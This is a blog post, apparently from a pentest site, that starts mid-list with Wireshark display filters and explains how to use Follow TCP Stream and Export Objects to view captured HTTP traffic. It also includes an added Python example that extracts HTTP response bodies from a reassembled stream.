<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong><br /></strong></div>
<div class="pretb" data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<div class="tb">
http.request.method != "TRACE"</div>
<div class="tb">
<br /></div>
<strong>Packets whose HTTP request method is GET</strong><br />
<strong><br /></strong>
<br />
<div class="tb">
http.request.method == "GET"</div>
<div class="tb">
<br /></div>
<div class="tb">
<strong>Packets whose HTTP request method is POST</strong></div>
<div class="tb">
<strong><br /></strong></div>
<div class="tb" id="ptb10">
http.request.method == "POST"</div>
<div class="tb" id="ptb10">
<br /></div>
<div class="tb">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong>TELNET</strong></span></div>
<div class="tb">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong><br /></strong></span></div>
<div class="tb">
telnet</div>
<div class="tb">
<br /></div>
<div class="tb">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong>FTP</strong></span></div>
<div class="tb">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong><br /></strong></span></div>
<div class="tb">
ftp</div>
</div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-61048783865860219202014-09-23T09:33:00.003+03:002015-01-20T22:23:40.827+02:00Follow TCP-UDP Stream and Export Object Features in Wireshark<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<b>Wireshark</b> shows the user the traffic line by line while it captures the chosen traffic. As you browse a website, every action performed on the site is visible in the traffic. However, that traffic is only understandable if you are familiar with the <b>TCP/IP</b> protocol structure. Moreover, if you are watching a video on <b>YouTube</b> while browsing a website, Wireshark records all of the traffic as it happens, so finding the lines you are looking for without filtering becomes difficult. Even if you find them, they are in <b>TCP/IP</b> protocol form and therefore hard to read.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
So can we view the traffic in a readable form? For example, websites use the HTTP protocol and are written in HTML. Can we see the traffic in those formats?</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
When you view an image on a site, you can see it byte by byte in the traffic. But how can we see it in its real image format, that is, visually? This is where Wireshark offers a very important feature: <strong>"Follow TCP/UDP Stream".</strong></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Let's capture the traffic of a web page.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfypa6bgrvWUDlHEqhJEru2YlJhVWFhEoO3-OaF79Gn01Ug68kTMGhquwNrIOrKk8Qr4A4oGU_vf_j4NcGcE9aBXAiojNbUMFJZ40jRFDqUR7Hxz6GC2K1tmkSzj5xsBzVe64gTJuh2FM/s1600/f1-1024x550.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfypa6bgrvWUDlHEqhJEru2YlJhVWFhEoO3-OaF79Gn01Ug68kTMGhquwNrIOrKk8Qr4A4oGU_vf_j4NcGcE9aBXAiojNbUMFJZ40jRFDqUR7Hxz6GC2K1tmkSzj5xsBzVe64gTJuh2FM/s1600/f1-1024x550.png" height="213" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">In this traffic, the light green rows are traffic from the same source. Right-click any of the green rows:</span><br />
<a name='more'></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxtFYYXhscacA1vWBUIKGlQow-z2uXQCxYOeiKOCIe_j3rYQ9ludXmGxEVBo69PdSi7kQamG22AiA2SH2vP4pKI1ujVLAHBBSA9VyvKpwcBoTygTsZaqz0lZuJmrTCobdyeH9dhztytsA/s1600/f2-1024x428.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxtFYYXhscacA1vWBUIKGlQow-z2uXQCxYOeiKOCIe_j3rYQ9ludXmGxEVBo69PdSi7kQamG22AiA2SH2vP4pKI1ujVLAHBBSA9VyvKpwcBoTygTsZaqz0lZuJmrTCobdyeH9dhztytsA/s1600/f2-1024x428.png" height="166" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Choosing <b>"Follow TCP Stream"</b> takes us to the meaningful form of the traffic, which otherwise consists of <b>1</b>s and <b>0</b>s.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibO3l-65x5tbdk-OGaqzj-HqUxic9_Mmj3nHoq2trALGO4iviBvzvtf7tmujB3Fr8YPxpERHL97F7lkxWxMb1ByZkuxdTqqdhFDZhpnEuWwyNzRdhAZKxWntM2tNn11d3mEHWpcB69sNg/s1600/f3-1024x549.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibO3l-65x5tbdk-OGaqzj-HqUxic9_Mmj3nHoq2trALGO4iviBvzvtf7tmujB3Fr8YPxpERHL97F7lkxWxMb1ByZkuxdTqqdhFDZhpnEuWwyNzRdhAZKxWntM2tNn11d3mEHWpcB69sNg/s1600/f3-1024x549.png" height="213" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">The image above shows what the flowing traffic corresponds to, that is, the HTML code of the site you are browsing. We can save this traffic if we want.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5ebFGh8jmOz6PdyQ1I0mqiv-7RZvOHvqEk_WcevbZUFEgXhKbAr2IqgtxWW2VkBdPhRcz9e5RLFfDnAxADcKoyzhM5jgFBGOi8GIn4p0CauBKpm1xH-s5ClpkSmSsKDX1Vv8o-fER3JM/s1600/f5-1024x74.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5ebFGh8jmOz6PdyQ1I0mqiv-7RZvOHvqEk_WcevbZUFEgXhKbAr2IqgtxWW2VkBdPhRcz9e5RLFfDnAxADcKoyzhM5jgFBGOi8GIn4p0CauBKpm1xH-s5ClpkSmSsKDX1Vv8o-fER3JM/s1600/f5-1024x74.png" height="28" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">When we click the <b>"Save As"</b> button, it asks us to choose where to save. We can save the stream wherever we like and examine it.</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAWfUVd1eSPPsoTTw7Ex0prAgGS7WhGvyxPdzdqF3BbfKcKdU16hH_6uR1V9Z90bmIwJvPd8LXM8gPM54wH16t7EgAxHCIY0Mxi50yttZPBCq3NPXFZJUPaod205A-qQNJnVrbdoovtG0/s1600/f6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAWfUVd1eSPPsoTTw7Ex0prAgGS7WhGvyxPdzdqF3BbfKcKdU16hH_6uR1V9Z90bmIwJvPd8LXM8gPM54wH16t7EgAxHCIY0Mxi50yttZPBCq3NPXFZJUPaod205A-qQNJnVrbdoovtG0/s1600/f6.png" height="315" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong>Export Object Feature:</strong></span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
With this feature, too, we can see and save files of every format from the flowing traffic. It is reached from the File menu, and under the <b>Export Objects --> HTTP</b> option we can see the data belonging to this protocol <b>(HTTP)</b>.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaY7eS24xhvJbRf3Ap0j0q0WPJYhx8UYkUYUJ5FUAzrCQ_NQrBG9-OZ03HakujqB4T3mLhx2NYtPeEQfIUfD5z_mQ_94LPDcV7JsexCVESquMpEKOT5DCFeruA3aSx9TRqBwgcDhpuRj4/s1600/f8-1024x427.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaY7eS24xhvJbRf3Ap0j0q0WPJYhx8UYkUYUJ5FUAzrCQ_NQrBG9-OZ03HakujqB4T3mLhx2NYtPeEQfIUfD5z_mQ_94LPDcV7JsexCVESquMpEKOT5DCFeruA3aSx9TRqBwgcDhpuRj4/s1600/f8-1024x427.png" height="166" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">When we click the <b>Export Objects --> HTTP</b> option, we can see all the data that passed through the traffic in its original format.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC3uj3qXpI5BY5YjM2Pf5mYz32CGwwWRGcJqpyIgj5pddrSpq2-bgFim4dzNUQBFuTWxQI6Pixy9K9POnZtmZE6wlKUODLUHWVRGYkqgVu7Z3khSu2rH1h7McnvqDa_lPUOnnXiv_i8Lg/s1600/f9-1024x674.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC3uj3qXpI5BY5YjM2Pf5mYz32CGwwWRGcJqpyIgj5pddrSpq2-bgFim4dzNUQBFuTWxQI6Pixy9K9POnZtmZE6wlKUODLUHWVRGYkqgVu7Z3khSu2rH1h7McnvqDa_lPUOnnXiv_i8Lg/s1600/f9-1024x674.png" height="262" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
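What the Export Objects --> HTTP step does with a followed stream can be reproduced by hand. The sketch below is an added example, not part of the original post: it walks the server-to-client bytes of one reassembled TCP stream and carves out each HTTP response body, handling both Content-Length and chunked transfer encoding. The function names and the sample stream are constructed for illustration, and the stream is assumed to be complete apart from possibly truncated headers.

```python
# Constructed sample: server-to-client bytes of one keep-alive TCP stream.
SAMPLE_STREAM = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n"
    b"Content-Length: 18\r\n\r\n<html>hello</html>"
    b"HTTP/1.1 200 OK\r\nContent-Type: image/png\r\n"
    b"Transfer-Encoding: chunked\r\n\r\n4\r\n\x89PNG\r\n3\r\nabc\r\n0\r\n\r\n"
)

def _dechunk(data, pos):
    """Decode a chunked body starting at pos; return (body, next_pos)."""
    body = b""
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol].split(b";")[0], 16)  # drop chunk extensions
        pos = eol + 2
        if size == 0:
            while not data.startswith(b"\r\n", pos):  # skip trailer lines
                pos = data.index(b"\r\n", pos) + 2
            return body, pos + 2
        body += data[pos:pos + size]
        pos += size + 2  # chunk data plus its CRLF

def carve_http_objects(stream):
    """Return (status, content_type, body) for every response in the stream."""
    objects, pos = [], 0
    while pos < len(stream):
        head_end = stream.find(b"\r\n\r\n", pos)
        if head_end < 0:
            break  # headers cut off: capture ended mid-response
        lines = stream[pos:head_end].decode("latin-1").split("\r\n")
        status = int(lines[0].split()[1])
        fields = (line.partition(":") for line in lines[1:])
        headers = {k.strip().lower(): v.strip() for k, _, v in fields}
        pos = head_end + 4
        if status in (204, 304) or status < 200:
            body = b""  # these responses never carry a body
        elif "chunked" in headers.get("transfer-encoding", "").lower():
            body, pos = _dechunk(stream, pos)
        elif "content-length" in headers:
            end = pos + int(headers["content-length"])
            body, pos = stream[pos:end], end
        else:
            body, pos = stream[pos:], len(stream)  # body runs until close
        ctype = headers.get("content-type", "application/octet-stream")
        objects.append((status, ctype.split(";")[0].strip(), body))
    return objects

if __name__ == "__main__":
    print([(s, t, len(b)) for s, t, b in carve_http_objects(SAMPLE_STREAM)])
```

The Content-Type of each carved object is what lets an analyst sort saved files by their original format; anything visible this way was sent over unencrypted HTTP.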